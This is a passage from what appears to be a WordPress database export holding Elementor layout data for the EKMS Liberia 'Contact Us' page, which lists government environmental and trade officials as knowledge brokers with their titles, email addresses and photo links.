Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23303,3382,'_elementor_edit_mode','builder'),(23304,3382,'_elementor_template_type','wp-page'),(23305,3382,'_elementor_version','3.0.16'),(23306,3382,'_wp_page_template','default'),(23307,3382,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\nManager, ESIA\\nDepartment of Compliance and Enforcement\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Daoda S. Carlon <\\/strong>\\n<p>Assistant Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA <\\/br>\\ncarlonbaindu@gmail.com\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries 